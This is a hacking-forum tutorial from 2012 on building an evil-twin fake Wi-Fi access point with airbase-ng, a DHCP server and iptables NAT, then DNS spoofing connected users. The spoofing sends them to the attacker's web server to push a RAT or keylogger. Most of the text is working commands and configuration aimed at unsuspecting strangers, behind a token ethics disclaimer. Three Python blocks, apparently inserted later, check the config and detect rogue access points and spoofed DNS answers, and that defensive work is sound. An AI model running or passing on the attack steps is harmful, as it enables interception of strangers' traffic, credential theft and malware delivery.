Tuesday 2 October 2012

Tired of cracking WEP? Tired of WPA and countless hours of dictionary attacks? Then it's time to be sexy. YOU need to be sexy. And I'll show you how.

Here's the deal: how would you like to create a fake access point named, say, Wifi Hotspot, and have people connect to YOU? From there, you can mess around with them, DNS spoof them to websites, or even to your own web server convincing them to download your RAT/keylogger. Or how about monitoring all their websites and network traffic? I won't show you all of this, but I'll show you some.


First off, I would like to give a huge shoutout to member proxx8187. He helped me a great deal diagnosing problems in the making of this tutorial. Some of you may recognize him as the encyclopedia giving answers to all of your incessant questions ;) Another big shoutout goes to SpyFi. He inspired me to pursue this area and thus the creation of this tutorial. Some may recognize him as the genius behind many great tutorials all around HF, as well as his Android hacking threads. Another member who helped to diagnose problems was GeeMann. He's amazing and one of the highest quality users I've seen around the HF wireless section. In case you didn't know, he's the mastermind behind our WPS cracking tutorial. I also would like to thank CapitalS for helping me out too in the creation of this tutorial. This was made mostly by me, but would have been impossible without the help of these four great members!

Now the tutorial!! This is for educational purposes only. Please stay ethical with this and always get permission before you do something. I know you will ignore my plea for righteousness, but really, stay ethical. It will pay off in the long term! Now, let me give a brief overview of what we are going to accomplish here. We will create a fake access point with whatever name you like, and provide any person that connects to it with internet access, so they will think they are on a legitimate access point! Then, from there, we can do many things to the client.

TABLE OF CONTENTS:

WHAT WE NEED

STEP ONE: GETTING THE DHCP3 SERVER

STEP TWO: CONFIGURING THE DHCP3 SERVER

STEP THREE: SETTING UP THE FAKE ACCESS POINT AND RUNNING THE DHCP3 SERVER

STEP FOUR: SETTING UP IPTABLES SO THAT CLIENT CAN HAVE INTERNET ACCESS

STEP FIVE: SCREWING WITH PEOPLE


WHAT WE NEED:
1. Two wireless interfaces. (An external USB wifi adapter, plus your internal wifi laptop adapter) A good external wifi adapter is the ALFA AWUS036H. It's the one I use. You can get one for about 25 dollars on Amazon.
2. Backtrack 5 R2 (R1 should work, but this was tested on R2)
3. A brain please.


STEP ONE: GETTING THE DHCP3 SERVER

We need to update Backtrack and then install the dhcp3 server.

Code:
apt-get update && apt-get upgrade && apt-get dist-upgrade

Code:
apt-get install dhcp3-server

Cool, we've got everything we need! We are ready to begin our attack. Please make sure that your laptop interface (should be wlan0) is connected to your own router. Make sure that your external interface is plugged in and ready to go (this one should be wlan1).

STEP TWO: CONFIGURING THE DHCP3 SERVER

We must begin by configuring our dhcp3 server so that our clients receive an IP address when they connect. Your laptop interface should be connected to your router right now, and the external interface plugged in but not connected to any router. First we run a check to find out which DNS server our own connection uses.

Code:
cat /etc/resolv.conf

See that IP address printed after "nameserver"? That's the DNS address. Please take note of it. In the code that follows, we will replace $dns with the DNS address you saw in the previous command.

Code:
gedit /etc/dhcp3/dhcpd.conf

If you are using Backtrack 5 KDE version, type this instead:

Code:
kwrite /etc/dhcp3/dhcpd.conf

If kwrite doesn't work, replace it with kate.

Now we have a text editor open with some text in it. Delete everything you see, and replace it with this:


Code:
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
# Clients on at0 live in 192.168.2.128/25 (usable hosts .129 to .254)
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
# The fake AP's own address on at0, handed to clients as their default gateway
option routers 192.168.2.129;
# Replace $dns with the nameserver from /etc/resolv.conf
option domain-name-servers $dns;
# Addresses leased to clients; the gateway .129 is deliberately outside it
range 192.168.2.130 192.168.2.140;
}

Remember to replace $dns with your DNS address you learned earlier!!! So a possible line will look like this:

Code:
option domain-name-servers 192.168.0.1;
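A mistyped subnet block is the usual reason dhcpd3 refuses to start later on, so here is an added sanity check (my own script, not part of the original tutorial): it parses the block above with Python's ipaddress module and verifies that the broadcast address, router and lease range all agree with 192.168.2.128/25, and that $dns was actually replaced. The embedded sample is the block above with $dns deliberately left in so the check has something to flag.

```python
import re
import ipaddress

# Constructed sample: the tutorial's subnet block with $dns left unreplaced on purpose.
SAMPLE_CONF = """\
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers $dns;
range 192.168.2.130 192.168.2.140;
}
"""

def parse_subnet_block(conf):
    """Pull the statements of the first 'subnet ... { ... }' block into a dict."""
    m = re.search(r"subnet\s+(\S+)\s+netmask\s+(\S+)\s*\{(.*?)\}", conf, re.S)
    if not m:
        raise ValueError("no subnet block found")
    fields = {"subnet": m.group(1), "netmask": m.group(2)}
    for key, val in re.findall(r"^\s*(?:option\s+)?([\w-]+)\s+([^;]+);", m.group(3), re.M):
        fields[key] = val.strip()
    return fields

def check_subnet_block(conf):
    """Return a list of problems; an empty list means the block is consistent."""
    f = parse_subnet_block(conf)
    net = ipaddress.ip_network(f"{f['subnet']}/{f['netmask']}", strict=False)
    problems = []
    if str(net.network_address) != f["subnet"]:
        problems.append(f"subnet {f['subnet']} is not the network address of {net}")
    if f.get("broadcast-address") != str(net.broadcast_address):
        problems.append(f"broadcast-address should be {net.broadcast_address}")
    router = ipaddress.ip_address(f.get("routers", "0.0.0.0"))
    if router not in net or router in (net.network_address, net.broadcast_address):
        problems.append(f"routers {router} is not a usable host address in {net}")
    lo, hi = (ipaddress.ip_address(a) for a in f.get("range", "0.0.0.0 0.0.0.0").split())
    if lo > hi or lo not in net or hi not in net:
        problems.append(f"range {lo}-{hi} does not lie inside {net}")
    elif lo <= router <= hi:
        problems.append("the router address is inside the client range and may be leased out")
    dns = f.get("domain-name-servers", "")
    if dns.startswith("$"):
        problems.append(f"domain-name-servers still contains the {dns} placeholder")
    elif not re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}(\s*,\s*\d{1,3}(\.\d{1,3}){3})*", dns):
        problems.append(f"domain-name-servers {dns!r} is not a list of IPv4 addresses")
    return problems
```

Run it against the real file with `check_subnet_block(open("/etc/dhcp3/dhcpd.conf").read())` before starting dhcpd3.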

STEP THREE: SET UP THE FAKE ACCESS POINT AND RUN THE DHCP3 SERVER

Let's configure our wireless interfaces, shall we? We need to put our external interface into monitor mode. If you don't know the names of your interfaces, type "ifconfig" without quotes, and it will show you. In my situation, the external interface is wlan1, so just replace that with YOUR external interface.

Code:
airmon-ng start wlan1

Code:
airbase-ng -e "NAME OF ACCESS POINT HERE" -c 9 mon0

Now open a new terminal and type the following commands. They bring up the at0 interface that airbase-ng created, give it the gateway address from dhcpd.conf, and start the dhcp3 server on it. Be sure to enter each command separately.

Code:
# at0 is the tap interface airbase-ng created for the fake AP
ifconfig at0 up
ifconfig at0 192.168.2.129 netmask 255.255.255.128
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
# dhcpd3 needs its pid directory and an (empty) leases file to exist
mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
echo > '/var/lib/dhcp3/dhcpd.leases'
# -d -f keeps dhcpd3 in the foreground so you can watch leases being handed out
dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0

You should now have two terminals running. One with airbase-ng maintaining your fake access point, and another with the dhcp3 server open. We now need to set up our iptables to let our clients gain internet access.
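Seen from the other side of the fence, a soft AP like the one airbase-ng is now beaconing is exactly what a wireless IDS looks for: a network name that is suddenly advertised by a radio nobody operates. Here is an added Python example (mine, not from the tutorial) that spots that from a list of beacon sightings, either against an assumed BSSID inventory or by comparing two surveys. The sightings and the inventory are constructed sample data.

```python
from collections import defaultdict

# Constructed sample of beacon sightings (bssid, essid, channel) as a survey tool
# or a WIDS sensor would record them. The third row is a soft AP on channel 9
# advertising the same name as the two real access points.
SAMPLE_BEACONS = [
    ("00:11:22:33:44:55", "Wifi Hotspot", 6),
    ("00:11:22:33:44:56", "Wifi Hotspot", 11),
    ("00:c0:ca:aa:bb:cc", "Wifi Hotspot", 9),
    ("66:77:88:99:aa:bb", "Guest", 1),
]

# Assumed inventory of the BSSIDs the organisation actually operates.
KNOWN_BSSIDS = {"00:11:22:33:44:55", "00:11:22:33:44:56", "66:77:88:99:aa:bb"}

def bssids_by_essid(beacons):
    """Group sightings by network name: {essid: {bssid: channel}}."""
    groups = defaultdict(dict)
    for bssid, essid, channel in beacons:
        groups[essid][bssid.lower()] = channel
    return dict(groups)

def find_rogue_aps(beacons, known_bssids):
    """Return [(bssid, essid, channel)] for radios that advertise one of our
    network names but are not in the inventory: the evil-twin signature."""
    known = {b.lower() for b in known_bssids}
    our_essids = {essid for bssid, essid, _ in beacons if bssid.lower() in known}
    return sorted((b, e, c) for b, e, c in beacons
                  if e in our_essids and b.lower() not in known)

def essids_with_new_radios(beacons, seen_before):
    """Without an inventory, flag names that gained a BSSID since the last survey."""
    current = bssids_by_essid(beacons)
    previous = bssids_by_essid(seen_before)
    new = {e: sorted(set(current[e]) - set(previous.get(e, {}))) for e in current}
    return {e: bssids for e, bssids in new.items() if bssids}
```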

STEP FOUR: SET UP IPTABLES SO THAT CLIENT CAN HAVE INTERNET ACCESS

Your laptop interface should be connected to your router!! I am assuming your laptop interface is wlan0, but if not, type ifconfig to see which one it is. If you don't know what it is, you should close out of this tutorial. There are some variables in this next code you will need to replace yourself. I will tell you how and which.

We need to find your gateway address. Type the following into a new terminal:


Code:
route | grep "default"

See that IP address next to "default"? That is your gateway IP address, and you should take note of it. In most cases it will be the same as your DNS address. Remember your laptop interface? It should be wlan0; if not, you should know what it is. In the following code, replace $interface with your laptop interface, and $gateway with your gateway IP address. Be sure to enter each command separately (yes, a lot of copy and pasting).

Code:
# Let the kernel forward packets between at0 and your laptop interface
echo 1 > /proc/sys/net/ipv4/ip_forward
# Start from empty filter and NAT tables
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
# NAT the clients' traffic out through your own uplink
iptables --table nat --append POSTROUTING --out-interface $interface -j MASQUERADE
# "+" is the iptables wildcard for any interface
iptables -A INPUT -i + -j ACCEPT
iptables -A OUTPUT -o + -j ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
# Send the clients' UDP (DNS) traffic to your real gateway
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gateway

Congratulations!!! You have set up a fake access point with WORKING internet connection. Go ahead, give it a try using another computer and connect to your access point!

STEP FIVE: SCREWING WITH PEOPLE

Now that our client(s) are connected to YOU, you can do whatever you want to them! One of my favorites is the use of DNS spoofing. While your clients are connected to you, you can redirect whatever website they visit to whatever website you want them to go to. Or, even better, you can redirect them to your own web server on your computer that could convince them to download a RAT or keylogger.

I will show you how to perform a simple DNS spoofing attack on your client. Create a file in your root home folder (/root) named spoof. Enter the following text into that file.


Code:
192.168.2.129 *

Now we initiate the DNS spoofing attack. This will redirect every website our client visits to YOU. So if you are running your own web server on your computer, they will be redirected to that web server. This is great for Java Applet attacks and other Social Engineering Toolkit stuff! Use the search option at the top of this website to find out more.

Code:
dnsspoof -i at0 -f /root/spoof

There, now every website they visit will be redirected back to your own web server! Note, if you want this attack to be more flexible, edit the spoof file you created earlier. Each line has two fields: 192.168.2.129 is the IP address you want to redirect them to, and the field after it is the hostname whose requests are redirected (* matches any name). For example, if I want to redirect my client's requests for google.com to yahoo.com, I would enter the following in my spoof file.


Code:
98.139.183.24 google.com

Here, 98.139.183.24 is the IP address of yahoo.com. You can find the IP address of websites by pinging them in the terminal.

Code:
ping yahoo.com
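The wildcard rule above leaves a very visible footprint on the client: every name it asks for, however unrelated, comes back as the gateway's private address. The following Python example (added here, not part of the tutorial) turns that into a client-side check over a list of observed (name, answer) pairs: it flags public hostnames that resolve to non-global addresses, many names collapsing onto the gateway, and, for names whose correct address is pinned out of band, any answer that differs. All samples and pinned values are constructed.

```python
import ipaddress

LOCAL_SUFFIXES = (".lan", ".local", ".internal", ".home.arpa")
GATEWAY = "192.168.2.129"  # the router address the tutorial's dhcpd hands out

# Constructed sample: answers a client on the fake AP sees once dnsspoof runs
# with the "192.168.2.129 *" rule (every name collapses to the gateway).
SPOOFED_ANSWERS = [
    ("google.com", "192.168.2.129"),
    ("yahoo.com", "192.168.2.129"),
    ("example.org", "192.168.2.129"),
]
# Constructed control sample from a healthy network.
NORMAL_ANSWERS = [
    ("example.org", "93.184.216.34"),
    ("printer.lan", "192.168.0.50"),
    ("yahoo.com", "98.139.183.24"),
]

def dns_spoof_indicators(answers, gateway, pinned=None, min_collapsed=2):
    """Return human-readable findings; an empty list means nothing looked forged.
    pinned: {name: address} learned out of band (e.g. through a VPN resolver)."""
    findings = []
    names_per_addr = {}
    for name, addr in answers:
        ip = ipaddress.ip_address(addr)
        names_per_addr.setdefault(addr, set()).add(name)
        # A public hostname should never resolve to an RFC 1918 or loopback address.
        if not name.endswith(LOCAL_SUFFIXES) and not ip.is_global:
            findings.append(f"{name} resolved to non-global address {addr}")
        # Catches the targeted form too ("98.139.183.24 google.com"), where the
        # forged answer is a perfectly public address.
        if pinned and name in pinned and addr != pinned[name]:
            findings.append(f"{name} resolved to {addr}, expected {pinned[name]}")
    # The wildcard rule makes many unrelated names share the gateway's address.
    collapsed = names_per_addr.get(gateway, set())
    if len(collapsed) >= min_collapsed:
        findings.append(f"{len(collapsed)} different names all resolved to gateway "
                        f"{gateway}: " + ", ".join(sorted(collapsed)))
    return findings
```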

This is the end of my tutorial. I hope you found it informative, as well as a fresh new way of performing wireless attacks. There are myriad ways you can leverage this attack to perform all sorts of man-in-the-middle attacks, but I leave that up to you to research. I did the hard part for you, so now it's up to you to figure out the rest! Please say thanks!
